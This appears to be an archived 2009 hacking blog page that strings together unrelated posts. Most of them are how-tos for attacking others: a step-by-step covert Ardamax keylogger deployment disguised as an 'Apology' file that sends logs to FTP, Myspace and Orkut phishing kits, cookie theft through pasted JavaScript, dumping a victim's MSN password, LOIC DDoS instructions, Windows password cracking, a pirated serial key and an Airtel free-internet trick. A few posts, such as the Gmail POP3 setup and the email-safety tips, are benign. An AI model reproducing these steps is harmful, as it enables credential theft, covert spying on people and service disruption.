Paid To Popup Hacking Articles: June 2009

Airtel Hack for free internet

This trick is tried and fully working. (Y)

First thing make sure your DSL modem is on. Start your browser. Type http://192.168.1.1 as the address with Username : admin Password : password
Note : These are case sensitive. Make sure all are typed in lowercase. Click on Advanced Setup -> NAT in the page that loads. If you do not see these options try entering http://192.168.1.1/main.html as the address. Some routers/modems deliberately try to prevent users from accessing these options. On the NAT virtual servers page click the add button. Now add the port number that you wish to open up. You can even open up a range of ports using the add button. You should see something similar to the screenshot below. Click it to view full image


Beeter 220 BX Screen Shot
This technique can be used for any operating system / modem / service provider. It may vary slightly but the essential principle remains the same.

You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It’s FREE to activate so no probs)
2) Create TWO Airtel gprs data accounts (TWO) and select the
FIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal.
***************************************************************************************************************

TWO

Under DATA COMM
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF

Under INTERNET PROFILES
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy


Three

1st go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)
now save it
NOW!
go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy adress and give the adress as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS


How to break windows password

This tutourial is how to break windows passwords using cain & able,which you can download fromhere :-)Just follow steps below. 1) Download Cain & Abel v4.9.31 & install it. 2)Start Cain 3)Click on Cracker tab , on the left- choose LM & NTLM Hashes & click on + sign icon on toolbar then Dump NT Hashes from the Local machine 4)Next 5)After this will appear windows accounts,right click on the

Anonymous surfing/email / fake name generator

Anonymous surfing/ Proxie`sunblocked.org MegaproxyAnonymous emailzekty.comsoom.czhttp://www.2sneaky.info/index.php?q=d3d3...29t&hl=3edhttp://www.surf-ip.com/index.php?q=d3d3L...29t&hl=2edhttp://www.wayaroundit.info/index.php?q=...29t&hl=3edhttp://www.hidemypath.info/index.php?q=d...29t&hl=3edhttp://www.nicetrick.info/index.php?q=d3...29t&hl=3edhttp://www.35d.info/index.php?q=d3d3Lndo...29t&hl=

About keyloggers/keystroke logger

There are various kinds of keylogging methods around, but currently, the most popular ones in the consumer market are the software-based and hardware-based keyloggers. The difference between the two is that hardware keyloggers have their own micro controller or mini-computers at work & are independent from the computer’s processor, memory & operating system. A plug-in device or a hardware

Disclaimer

The information provided on here is to be used for educational purposes only. The creator is in no way responsible for any misuse of the information provided. All of the information on this blog is meant to help the reader develop a hacker defense attitude in order to prevent the attacks that are discussed. In no way should you use the information to cause any kind of damage directly or

Bluetooth Sniffing



Gmail POP3 Configuration


I received several emails lately that asked me how to setup email clients so that they could retrieve Gmail emails using the POP3 protocol. The Gmail POP3 configuration is fortunately not that complex: The major problem that most users run into is that POP3 has to be enabled in the Gmail web interface before they can actually retrieve their emails in another email client.

Enabling POP3 in Gmail is therefor a two-step process. POP3 needs to be enabled on the Gmail website first before the other email client is configured to connect to Gmail using the POP3 protocol.

Enabling Gmail POP3

Open the Gmail homepage, log into your Gmail account and click on the [Settings] link in the top right corner of the screen to open the Gmail configuration. Now select the [Forwarding and POP/IMAP] link which should open a page just like the one you see below on the screenshot.

You basically got two options here to enable POP3. The first [Enable POP for all mail (even mail that's already been downloaded)] enables POP3 in Gmail for all email messages even those that have already been retrieved while the second [Enable POP for mail that arrives from now on] enables POP3 from that moment on which means that old emails cannot be retrieved. A click on the Save Changes button will save the changes and allow POP3 connections.

Gmail POP3 Data

It is time to create the accounts in the email client now that POP3 has been enabled in Gmail. The procedure is different depending on the email client at hand. Below are the values that need to be entered into the email client.

Email Address: Enter your full Gmail email address
Password: Enter your email password
Incoming Server: pop.gmail.com
Incoming Server Port: 995
Outgoing Server: smtp.gmail.com
Outgoing server (SMTP) port: 587
Encryption: TLS

You can check out the help pages over at Gmail that contain configuration walkthroughs for various popular email clients.

Hacking tools

Tools for linuxPort scannersAll in-one ultra-hackerKeyloggersHacking the pspAnonymous surfing/ Proxie`s/email & fake name generator can be found hereunblocked.org MegaproxyAnonymous emailzekty.comsoom.cz

Building a basic keylogger

About keyloggers/key stroke loggerBuilding a basic keyloggerOk. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to start Logging(This wont be able to start on start up)Now using api guide or just copying from here, declare a new function. the GetASyncKeyState

Hacking tutourials

Hacking tools here**********************************This the tutourial section for our guides***************************What is a trojan ?What is a hacker ?Learn to hackTutourial on using google as a hacking toolHow to download /burn movies to dvdA guide on harmless hackingJailbreaking the ipod tutourialDownload a keylogger/key stroke loggerCreating a simple virus in v.b. Building a trojan

Security applications

Anti-Trojan Elite 4 4 9 Anti Trojan Elite(ATE) is a malware remover, it can detect and clean malware in disk or memory.Anti Trojan Elite provide a real-time malware firewall for user, once a trojan or keylogger would been loaded, the ATE can detect, block and then clean it in time before it starts. The ATE can detect more than 22000 trojans, worms and keyloggers currently, and the number of

Automated Email Archiving and Monitoring In Microsoft Outlook

It is sometimes important to monitor and archive emails, especially in a business environment. One example would be that a supervisor wants a copy of every email that an employee sends to customers to keep track on everything. Probably the easiest way of achieving this is to add the supervisor as a cc or bcc recipient in the emails. This is supported by all modern email clients be they web based such as Gmail, Microsoft Live Mail and Yahoo Mail or desktop based such as Mozilla Thunderbird or Microsoft Outlook.



The Outlook Auto BCC / CC add-in has been designed specifically for Microsoft Outlook. It allows the installation of automatic bcc and cc recipients in email messages based on rules. Possibilities include setting a rul for all outgoing emails from all email accounts, messages send to specific email addresses or messages that match specific phrases in the subject or attachment.

It is furthermore possible to create exceptions to rules so that certain email addresses and emails do not get archived or monitored.

This is an excellent solution for email archiving as well as it it unproblematic to send all emails to another email account for backup purposes. It would for example be possible to create a backup Gmail account and add that new email account as a BCC recipient for all email messages that are send from Microsoft Outlook. Another interesting option is to configure the Microsoft Outlook add-in so that only emails that contain specific keywords or phrases are send to another recipient.



The main benefit of this email archiving and monitoring solution is that the user behind the monitor does not has to remember to add a BCC or CC recipient as the Outlook add-in manages all aspects of this automatically.

Auto BCC / CC is compatible with Microsoft Outlook 2007, Outlook 2003, Outlook XP (2002) and Outlook 2000.


MSN (Hotmail) Hacking Software


MSN Password Hacker scans your computer for stored MSN account passwords and thus you can hack your msn account password. But, remember, for this msn hacking software to work, there must be locally stored msn passwords on victim computer.



Steps to Use MSN Password Hacker:

1. Download MSN password hacker software.

2. Now, extract the zip file and run WLMPasswords.exe. No installation is required for this.

3. In the text field next to "Filter", type in the Windows live messenger email address to be hacked and hit Check.



4. After this, MSN password hacker will scan computer for msn password.

5. And then, you will get MSN account password in plain "text format". Thus, windows live messenger account hacked !!!

Now, how do you hack friend's msn windows live messenger account password. Simply, run the msn hacking program on victim computer with his windows live messenger email id in Filter and hit check. Thus, MSN Password hacker will give you msn windows live messenger password and you will be able to hack his windows live messenger account...cheers.

Note: For this msn hacking software- MSN password hacker to work, you should have .NET Framework version 2.0 and windows live messenger installed.

I hope you are now able to hack friend's msn windows live messenger account password using this msn hacking software- MSN Password Hacker. If you have any query or comment about MSN Password hacker, please mention in comments section.

Enjoy HaCkInG.....

All methods of hacking orkut


Orkut has became major social network in India and even abroad. So, naturally, www.orkut.com is becoming a target of hackers. There are many hacking tricks or hacks to hack orkut account passwords. So, i have listed most popular Orkut account password hacking tricks. Below, i have mentioned all Orkut account password hacking methods.

1. Orkut Phishing:

As i have stated in all articles, Phishing is first priority to hack Orkut account passwords. Infact, it is most favorite method of orkut hackers. Here, you have to send a fake orkut login page (orkut phisher) to orkut friend and ask him to login to orkut account by this fake orkut login phisher. This orkut phisher is, ofcourse, prepared by you. When orkut friend logs in to orkut account by this orkut phisher, his orkut password is emailed to you and thus you can now hack his orkut account. I have added on how to make phisher in my article Hack email/orkut account by Phishing.

2. Keylogging :

This is most easy method ever found. Here, you have to install keylogger software on victim computer and give destination at which keylogger will send all passwords typed on friend's computer. And then keylogger will start recording all keystrokes on victim computer and send these passwords. This keylogging becomes more easy if you have physical access to victim computer. Even, remote keylogger installation can be done. You can use Ardamax keylogger to hack orkut account password.

3. Community links :

Many times, you are provided with community links in orkut scraps inviting you to join it. On clicking the link in orkut scrap, you are directed to orkut phisher explained above, ready to hack your orkut profile account.

4. Orkut Javascript hack :

This method became much famous in last year. Here, orkut victim is provided with some javascript (popularly called code) and is asked to copy paste this javascript code in his address bar for say changing his orkut theme. When victim does this, his orkut cookies are stolen and now orkut hacker can hack his orkut account using orkut cookies. I have written more on orkut cookie stealing in Hack Orkut account by Cookie stealing.

5. Orkut New Features :

I received an orkut scrap that looks like they are giving the user a choice of using new features for orkut with your ID and password, of course!! When user submits the orkut page, his ID and password is mailed to orkut hacker and thus his orkut account is hacked.


6. Primary email address hack :

If orkut hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this orkut hacker can easily hack your orkut account using "Forgot password" trick. He will simply ask orkut to send password reset email to your primary email address- which is already hacked. Thus, your orkut account password will be reset and orkut account hacked !!!

So, always remember to protect your orkut primary email address and try to keep unknown or useless mail id as your primary email address.

So friends, i hope you all are now knowing methods to hack orkut account passwords. I have tried to keep this orkut hacking article simple. If you have any comments or new methods on how to hack orkut account password, please mention it in comments section.

Enjoy HaCkInG.....

Hacking Down Websites

In this tutorial, I will show you how to take down websites via DDoS. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.



Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

DOWNLOAD HERE: http://rapidshare.com/files/104926676/LOIC.exe

I would like to inform you that i have not yet tried this hack, so i cant tell you much about it...sorry for that. But, you can help me out by commenting your experience or even by mailing me.

Enjoy HaCkInG.....

Shutdown Computer Using Your Mobile Phone

Be Safe of Phishing

Twitter User Spamming Himself Crazy


A Twitter user who has effectively spammed himself senseless reaches out to us for help. And we’re going to oblige. The only trouble is, he’s making yet another error in judgment, because my guess is this is going to make things worse.


Ryan Barr started a petition on Twitter to ask AT&T to “offer reasonable iPhone 3GS upgrade prices.” And even though it’s unlikely that AT&T cares even a little bit about this or any other petition, it’s getting some traction. Nearly 10,000 people have “signed” it.

The problem is that every time someone signs the petition it autotweets the message “Petition: AT&T to offer reasonable iPhone 3GS upgrade prices http://twitition.com/f96aq @ryanbarr,” which sends a message back to Barr and absolutely pollutes the reply stream (the only really useful way to interact with Twitter).

Anyway, here’s Barr’s message. I just signed the petition myself and I’m guessing a lot of you will, too. But don’t worry Ryan. It’ll slow down eventually, probably.

Dear TechCrunch,

My name is Ryan Barr, known on Twitter as @ryanbarr . If you may have noticed, I started a petition (or twitition) found here: http://twitition.com/f96aq .

I want out.

When I first started the petition, it was due to a rant I was having about the price of the phone. It didn’t take long for me to truly not care about the prices as much as I had. And it didn’t take much longer for the petition I started to go out of control.

At the time of this e-mail the petition just passed 9200 signatures. For each signature, a message is tweeted as follows:

“Petition: AT&T to offer reasonable iPhone 3GS upgrade prices http://twitition.com/f96aq @ryanbarr”

That’s right, 9200 @ryanbarr’s over the span of two (going on three) days. This does not include the unnecessary retweets people also make. I can no longer stand not being able to see real replies in my timeline. I have AT&T employees following me and saying stuff behind my back when I was just ranting on a site that seemed to have little activity.

I completely, COMPLETELY regret pressing the submit button. As the petition nears the 10000 mark I fear even more. As at that mark, TweetMeme will show me as a TM_10000 (@http://twitter.com/TM_10000) … the first, ever.

TechCrunch — you have the power to make businesses grow. You have the power to make or break the reputation of a new device. Please, help me find a way out of this petition. The attention I am receiving is unwanted — I just want to be able to come clear to all the signers and say, “I don’t want in this anymore. I didn’t mean for it to last this long.”

Thanks for anything and for the great reads over the longhaul.

Best Regards,
Ryan Barr

How To Prevent Your Email Being Hacked


Nowadays, its very common to hear about various incidents of Gmail hacking by Gmail phisher. Today, online privacy is maintained only if the user is aware of various hacks used to hack email accounts. Hence, i thought of writing an article on the same topic of preventing Gmail from being hacked by hackers. Friends, i highly recommend you to read this article to prevent ur future damages.

>>What is a phisher?

I have explained in my post Hack email account password by phishing., Phishing is the best working method of hacking email account. The advantage of phishing in email account hacking is that victim is not able to recognise the fake page (phisher) as this phisher matches with the original page(depends on hacker skills).



So, here i have mentioned few tips which you should follow to prevent hacking of your email account by hackers. So lets start:

1. Fishing filter:

I will recommend use of browser which has phishing filter. Internet browsers like Firefox 3.0(my favorite), Internet Explorer 7, Opera 7x which contain phishing filter should be used for safe browsing.

2. Do not provide sensitive information :

Yes, this is the main thing you have to remember. Unless and until, you know the person or institute, do not give your sensitive information like userids , passwords, bank account numbers as a reply to any email. In fact, 90% emails demanding such information are meant for hacking..remember !

3. Suspicious Filters :

Check whether there are any suspicious filters not created by you. For checking ur email filters, go to Settings->Filters. If you find any such suspicious filter not created by you, delete it urgently.

4. Great offers, ads, winners :

Generally, Gmail users are deceived by emails which contain great offers, ads or declaring that u are lucky winner and you should provide listed query information to receive your cash prize. Never click or provide any information for such claiming emails.

5. Disable Forwarding and POP/IMAP :

To disable forwarding and POP/IMAP, go to Settings-> Forwarding and POP/IMAP and disable forwarding and POP/IMAP.

6. The most important :

The most important precaution which one must follow is "do not click on the link" provided in the email without knowing to which page the link will take you. I have added my personal experience of phishing and the method to determine the link target, where i received a paypal phisher, in my article Paypal phisher to hack Paypal account. One more thing, always open link given in email by typing address of site in new tab/window.

Thus, if you will follow these guidelines, i bet ur Gmail account will never be hacked by a phisher. Just remember the guidelines and prevent Gmail account from being hacked by hackers.

Enjoy HaCkInG.....

How to Install Spy Keylogger

The post explains the method to install a keylogger on a computer to be hacked. A free keylogger for example Ardamax keylogger is a software which records all keystrokes on computer and thus one can obtain passwords easily and access or hack the required account. The trick is found to be working on all versions of Windows XP, Vista and even on other operating systems.

A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of receiving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated.

Let's begin.

Head on over to download Ardamax keylogger:

Code:

http://www.ardamax.com/keylogger/


And scroll to the bottom. Download the free trial software.

After downloading, open the program and install it on computer to be hacked. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.

Next, go to:

http://www.theserials.com/serial/serial_ardamax.html


Download the appropriate serial which will match your software version.

Now, open it, and it should give you a name and a jumble of letters and numbers.

Go back to the Ardamax icon at the bottom right, and right-click it.

Click the "Enter Registration Key" button.

Use your serial/crack to unlock the full version. Congratulations, you are now ready to make your first deployment package.

~NOTE~

If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.

~NOTE~

Again, right click the icon at the bottom-right.

Click "Remote Installation".

Click next.

Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc etc.

If you tick it, click Browse, and select the file.

If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.

Add any additional components you would like. I just leave mine as "log viewer" since all I grab are passwords from games.

From this point, click next.

Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.

Can't have that, now can we?

Click next.

For Security, do what you want. I leave all of it as-is and click next again.

Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.

Click next.

Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.

You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.

Click next.

Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.

Select 'FTP' and de-select everything else as a delivery method.

You may choose what you want to see. I take out screenshots. Causes lag for me.

Leave log format alone.

You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.

Continue on! (next.)

Now the fun part. -_-.

Head on over to:

http://phpnet.us/


Make an account, etc etc.

Save your FTP Account name and password. You'll need it in a moment.

This site will be the site that holds all information recieved by the keylogger.

When you're done, scroll down a bit.

Under "FTP Accounts", click "File Manager".

Near the top, click the "New Dir" button, and create a directory by any name you want. My favorite is "lolbeans".

Now, hold that thought. Bring the keylogger back.

In Ftp Host, put in:

ftp.phpnet.us

In "Remote Folder", put in the new directory's name you made. So, in this scenario, "lolbeans" without the "'s.

Fill in your Username and Password.

I leave Passive Mode checked because I'm not sure what it does, rofl. :[

Leave port alone as well. It's default.

Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "lolbeans" directory and there should be a test file in it.

Click next, if you're still alive.

Tick anything and everything you want.

Next.

If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.

Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you're apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it "Apology", and they fall for it.

Next.

This screen will go over with you everything that you have chosen. Make sure it's all correct.

Click Finish.

Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file.

If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg"

Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.

Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.

Enjoy HaCkInG....

Find Other's Password With Ardamax KeyLogger

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.


Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security - allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Download:
Code:
http://rapidshare.com/files/47779604/Setup.rar
[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]

Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT

Enjoy HaCkInG.....

Phishing So Easy to Get Other's Password: Hack MySpace Just Now

After informing you about the 4 popular and the best methods to hack Myspace account password as in my article How to hack myspace profile/account passwords, i will now inform you about “Myspace Phishing using Myspace Phisher” in this article. I have provided download link at end of this article to download Myspace Phisher about which i will be talking about in the article.



What do you think is the above site about?? Myspace….think it again. Its a Myspace phisher ready to steal account password.
Note: The article is for educational purpose only. I am not responsible for any action done by any reader. Any damage caused is sole responsibility of user.
Steps to use Myspace Phisher to hack myspace profile/account:

1. Download Myspace phisher from download link given at end.
2. The downloaded folder contains subfolder named “Myspace” which contains 3 files:
a. Index.html (our phisher to be sent).
b. next.php and
c. passwords.txt
Make sure you get all 3 files.
3. Now, simply upload these 3 files to a free webhost. You can use http://www.100webspace.com/ for this purpose as it is free.
4. Now, simply send index.html page (phisher) to the victim. You can use anonymous mailers for this purpose. Also, make sure that link of myspace phisher nearly matches with the corresponding original myspace page. Ask the victim to login to his myspace private account by using this page. You can make him do this by telling that his myspace account is accessed by 3rd party and to ensure his security, he should login immediately to his account and just provide myspace phisher link just below your saying. I once faced the same phisher…..was almost fallen but saved. You can even use many other myspace ways…depends on victim attitude, nature and your logic.
5. Thats it. Once, victim logins with myspace phisher, you will get password of his myspace private account.
Download Myspace Account phisher

This terminates the article over here. So, i hope you will now be able to hack myspace account/profile password using Myspace phisher. Can contact me for any help on how to hack myspace account password.

Enjoy HaCkInG…..

Hacking MySpace With Famous Four Ways

The article below explains the most popular ways used to hack myspace account passwords. I came across many myspace password hacking ways- some working …some not. So, i thought of collecting all these working myspace methods/ways of hacking myspace account password in this myspace article.

I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.
So, lets start…
Hack Myspace Account password
1. Myspace Phishing:
I have taken this myspace hacking method first because i think this is the most popular method/way to hack myspace private account. I studied various surveys taken on web about hacking myspace. The results of these surveys show “Phishing” as the most used method to hack myspace and to note…”Phishing is favorite method of hackers”. So, friends.. beware of Phishing. Myspace staff is working hard to avoid these phishers. Phishing not only allows you to hack myspace but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article Hack Myspace account password by Myspace Phisher
2.Keylogging:
This is my second favorite, as only thing you have to do is remotely install a keylogger (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded myspace account passwords to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use this log to get required myspace password and thus can hack myspace account. You can use Ardamax keylogger or Winspy Keylogger to hack myspace account password.
3. Social engineering:
This sounds to be pretty not working at beginning. Even i was neglecting this way. But, once, i thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engg is method of retrieving password or answer of security question simply by quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
4. Hacker virus:
I was not knowing about this method used by myspace hackers at myspace until i read this article. I wasn't knowing that myspace viruses are being circulated over myspace and was considering myspace as safe. But to my surprise, i was wrong. So, friends, be cautious while surfing myspace.
So far, i found these myspace hacking methods as best and working ways to hack myspace account passwords. I never encourage hacking myspace or any email account…just wanna make you cognizant about myspace dangers online. I will appreciate your effort if you mention any other method you found great….
Enjoy HaCkInG…..

Hacking Admin Password in Computer

So be ready to access Admin account ...


First you will want to download a software named WINTERNALS as an iso image at www.isohunt.com, once you done that burn it to a cd with an iso burner software.

-Once thats done you will turn the computer that you want to change the password off and when its booting up press F10, or F12, or F8 varies depending on the computer.


-You need to find the one that says BOOT DEVICE and it gives you a lot of other options like booting up from a floopy disk, but you want the one that says CDROM


-Insert the disk and press enter twice this will start the cd and it will say LOADING WINTERNALS then you will get a dialog box asking you what operating system to boot from so choose Windows sp2 and press enter

-You will notice that you get a desktop similar to windows, now go to start and look for the application named LOCKSMITH and press enter


-Now it will ask you what account to change the password


-Choose what ever account you want preferably choose the administrator account


-Now change the password, and press enter.


-And your almost done, now press start and press log off and choose restart.


-This will Restart the computer as usual now you can log on as the administrator account with the password you set.


Congrats....u've changed admin password...


Enjoy HaCkInG.....

Using Lophtcrack to crack/recover passwords....

This post describes method used to crack/recover windows XP password by using Lophtcrack. Thus, it can be used to recover lost passwords or even crack administrator accounts.

Update: For cracking Windows Vista admin account click here. Even John the Ripper is a powerful password cracking tool...

Now this what m gonna share is old but still works well.
Reference: geekwithlaptop

There's a way to crack the password and it doesn't involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.


How Lophtcrack works:


Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and then displayed to the screen.

Good intentions:
can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to access computers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.


Bad intentions:

Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domaincontroller and steal hundreds of passwords within minutes.
Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses or implied by http://rajeshhackingarticles.blogspot.com


Software License:


LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.


You can check out other posts related to password cracking:
Change Admin password...


Enjoy HaCkInG......

Orkut Hacking Tool

The post was added on demand "Where to download orkut hacktool" requested by Jai Sharma.

In my post Hack Orkut account by cookie stealing, i have explained the method used by most hackers to hack orkut account password. Now, here in this post "Hack Orkut account password by Orkut Hacktool", i have explained the use of orkut hacktool to hack orkut accounts. I have even added download link at the end of post to download this orkut hacktool for hacking orkut account.

Type: Orkut Software
COMPILED By: Vivek
Published at:
FABULOUS COLLECTION OF ORKUT TOOLS
ALL TOOLS AND SCRIPTS FOR ORKUT U WILL EVER NEED
Developed by OUGIANS

It contains tools like

► Floodmachines
► Profile Maker
► Community Spammer
► Community Joiner
► Accept All & Reject all Friends
and some more tools and scripts.

Sreenshots:

hack orkut account by hacktool

 hack orkut account


Download Link:


Click Here to Download Orkut account hacktool
password:- viveksinhaanurag



Enjoy HaCkInG.....

Hacking Orkut By Stealing Cookies

I have explained in my post Hack orkut account by Orkut hacktool the method used to hack orkut accounts using a orkut hacktool. This article below explains the method to hack orkut account by stealing orkut account cookies. Hacking orkut accounts has become much popular and hence i have added this article which will help you in hacking your friend's orkut account. Just ask the victim to copy the script in address bar and then you will be able to login/access /hack his orkut account. The another method for hacking orkut accounts is by means of orkut phishing (fake orkut login) which i have explained in my post Using phishing to hack accounts.


Note: My purpose is only to make u aware of what's happening around and not to teach u hacking orkut account, gmail or any account in any sort!!.

Procedure for hacking orkut account by stealing orkut cookies from mozilla firefox to hack gmail or orkut is given below.

"Hacking orkut account or Gmail" by "stealing orkut account cookies" :

The post explains how one can steal cookies to hack orkut account or gmail account. No password cracking method required.


Steps to hack gmail or orkut account password by stealing orkut cookies:-

1.Firstly you need have Mozilla firefox.
2.Download cookie editor plugin for Mozilla firefox from:

https://addons.mozilla.org/en-US/firefox/addon/573

3.You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:

